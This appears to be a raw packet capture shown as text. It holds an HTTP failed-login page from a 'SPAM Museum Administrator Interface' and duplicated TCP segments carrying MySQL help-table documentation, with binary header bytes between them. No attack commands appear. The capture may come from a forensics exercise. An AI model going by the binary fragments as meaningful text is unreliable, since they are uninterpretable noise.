CQ 0`BiE@/Lo0SE^<@@ô  3P: GM  y4'HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Content-Type: text/html SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C bbBi0`ET@/p܂Ao0E<*@?  3Pb  )EE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUCHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREC bb0`BiET@/Ԁo0SE<*@@  3Pb  )EE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUCHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCRECNbbBi0`ET@/p܂Ao0E<*@?  3Pb qW )MENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe descriptioChbb0`BiET@/Ԁo0SE<*@@  3Pb qW )MENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe descriptioCbbBi0`ET@/p܂Ao0E<*@?  3P b { )n of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECCbb0`BiET@/Ԁo0SE<*@@  3P b { )n of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECCbbBi0`ET@/p܂Ao0E<*@?  3Pb  )T LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VC3bb0`BiET@/Ԁo0SE<*@@  3Pb  )T LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer value not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VCZZBi0`EL@/܂Sŀo0E4@? 3 Pb컩)q )+8CZZBi0`EL@/܂Sŀo0E4@? 3 Px"lsg )+]C0ZZ0`BiEL@/go0AE4@@ 3 Pb컩)q )+8CCZZ0`BiEL@/go0AE4@@ 3 Px"lsg )+]CZZBi0`EL@/Plo0E4^=@?C  3P: מM Sl y7'CffBi0`EX@/ЂSŀo0E@@? 3 Px"l$ )+] 5CZZ0`BiEL@/܀o0SE4^=@@C  3P: מM Sl y7'Cff0`BiEX@/g؀o0AE@@@ 3 Px"l$ )+] 5CZZBi0`EL@/܂Sŀo0E4@? 3 P5"lm )+_CZZ0`BiEL@/go0AE4@@ 3 P5"lm )+_CbbBi0`ET@/أ  o0E<@?  PgZna8  _fɁles on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILCbb0`BiET@/4o0 E<@@  PgZna8  _fɁles on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNote that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILCobbBi0`ET@/p܂Ao0E<*@?  3Pb fp )ARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximum effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStartiCbb0`BiET@/Ԁo0SE<*@@  3Pb fp )ARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximum effective length is 65,532 bytes.)\n\nNote: Before 5.0.3, trailing spaces were removed when\nVARCHAR values were stored, which differs from the standard SQL\nspecification.\n\nFrom MySQL 4.1.0 to 5.0.2, a VARCHAR column with a length\nspecification greater than 255 is converted to the smallest TEXT\ntype that can hold values of the given length. For example,\nVARCHAR(500) is converted to TEXT, and\nVARCHAR(200000) is converted to MEDIUMTEXT. This is a\ncompatibility feature. However, this conversion affects trailing-space\nremoval.\n\nVARCHAR is shorthand for CHARACTER VARYING.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nStartiCV"bbBi0`ET@/p܂Ao0E<*@?  3P"b ; )ng from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and converts it to the\ncharacter represented by the number. The resulting characters are returned as\na binary string.\n','mysql> SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creatC_"ZZBi0`EL@/Ao0E4i@?  P7pGF d,7=vCx"bb0`BiET@/Ԁo0SE<*@@  3P"b ; )ng from MySQL 5.0.3, VARCHAR is stored with a one-byte or\ntwo-byte length prefix + data. The length prefix is two bytes if the\nVARCHAR column is declared with a length greater than 255.\n','',''),(205,'UNHEX',23,' UNHEX(str)\n\nDoes the opposite of HEX(str). That is, it interprets each pair of\nhexadecimal digits in the argument as a number and converts it to the\ncharacter represented by the number. The resulting characters are returned as\na binary string.\n','mysql> SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'',''),(206,'- UNARY',4,' -\nUnary minus. Changes the sign of the argument.\n','mysql> SELECT - 2;\n -> -2',''),(207,'COS',4,' COS(X)\nReturns the cosine of X, where X is given in radians.\n','mysql> SELECT COS(PI());\n -> -1.000000',''),(208,'DATE FUNCTION',14,' DATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'',''),(209,'RESET MASTER',6,'RESET MASTER\n\nDeletes all binary logs listed in the index file,\nresets the binary log index file to be empty, and creatC"ZZʪBiEL@/o0o0oE4i@@  P7pGF d,7=vC$ZZBi0`EL@/܂Sŀo0E4@? 3 P="lh )+aC$ZZ0`BiEL@/go0AE4@@ 3 P="lh )+aC(bbBi0`ET@/p܂Ao0E<*@?  3P *b I )es a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns C(bb0`BiET@/Ԁo0SE<*@@  3P *b I )es a new binary log\nfile.\n\nThis statement was named FLUSH MASTER before MySQL 3.23.26.\n','',''),(210,'TAN',4,' TAN(X)\nReturns the tangent of X, where X is given in radians.\n','mysql> SELECT TAN(PI()+1);\n -> 1.557408',''),(211,'PI',4,' PI()\nReturns the value of PI. The default number of decimals displayed is five, but\nMySQL internally uses the full double-precision value for PI.\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116',''),(212,'WEEKOFYEAR',14,' WEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the\nrange from 1 to 53. It is a compatibility function\nthat is equivalent to WEEK(date,3).\n','mysql> SELECT WEEKOFYEAR(\'1998-02-20\');\n -> 8',''),(213,'/',4,' /\nDivision:\n','mysql> SELECT 3/5;\n -> 0.60',''),(214,'STDDEV_SAMP',12,' STDDEV_SAMP(expr)\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP(). This function was added in MySQL 5.0.3.\n','',''),(215,'MLINEFROMWKB',13,' MLineFromWKB(wkb[,srid])\n MultiLineStringFromWKB(wkb[,srid])\nConstructs a MULTILINESTRING value using its WKB representation and SRID.\n','',''),(216,'UNCOMPRESSED_LENGTH',23,' UNCOMPRESSED_LENGTH(compressed_string)\nReturns C-bbBi0`ET@/p܂Ao0E<*@?  3P2b - )the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do C.-bb0`BiET@/Ԁo0SE<*@@  3P2b - )the length of a compressed string before compression.\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30',''),(217,'LOG2',4,' LOG2(X)\nReturns the base-2 logarithm of X.\n','mysql> SELECT LOG2(65536);\n -> 16.000000\nmysql> SELECT LOG2(-100);\n -> NULL',''),(218,'SUBTIME',14,' SUBTIME(expr,expr2)\n\n\nSUBTIME() subtracts expr2 from expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT SUBTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1997-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'',''),(219,'DROP TABLE',28,'DROP TABLE removes one or more tables. You must have the DROP\nprivilege for each table. All table data and the table\ndefinition are /removed/, so /be careful/ with this statement!\n\nIn MySQL 3.22 or later, you can use the keywords IF EXISTS\nto prevent an error from occurring for tables that don\'t exist. As of\nMySQL 4.1, a NOTE is generated for each non-existent table when\nusing IF EXISTS.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE are allowed to make porting easier.\nFor the moment, they do C-ZZBi0`EL@/܂Sŀo0E4@? 3 PE"lc ),aC-ZZ0`BiEL@/go0AE4@@ 3 PE"lc ),aC/ZZBi0`EL@/Ao0E4@?H  PPZǀ"lb d/^C/ZZ0`BiEL@/o0  E4@@G  PPZǀ"lb d/^Cx1bbBi0`ET@/p܂Ao0E<*@?  3P:b  )nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databases).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of substring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql>C1ZZBi0`EL@/܂Sŀo0E4@? 3 PM"l^ ),cC1bb0`BiET@/Ԁo0SE<*@@  3P:b  )nothing.\n\nNote: DROP TABLE automatically commits the current\nactive transaction, unless you are using MySQL 4.1 or higher and the\nTEMPORARY keyword.\n','DROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]',''),(220,'DUAL',22,'SELECT ... FROM DUAL is an alias for SELECT ....\n(To be compatible with some other databases).\n','',''),(221,'INSTR',23,' INSTR(str,substr)\nReturns the position of the first occurrence of substring substr in\nstring str. This is the same as the two-argument form of\nLOCATE(), except that the arguments are swapped.\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql>C1ZZ0`BiEL@/go0AE4@@ 3 PM"l^ ),cCl3bbBi0`ET@/أ  o0E<@?  PgZva8 N _gɁE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n Cv3ZZBi0`EL@/$T<o0E41@?Q`  Pհfـ O 1TX7=w;C3bb0`BiET@/4o0 E<@@  PgZva8 N _gɁE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(332,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n C3ZZʪBiEL@/o0o0oE41@@Q  Pհfـ P 1TX7=w;C`5bbBi0`ET@/p܂Ao0E<*@?  3PBb 7 ) SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' 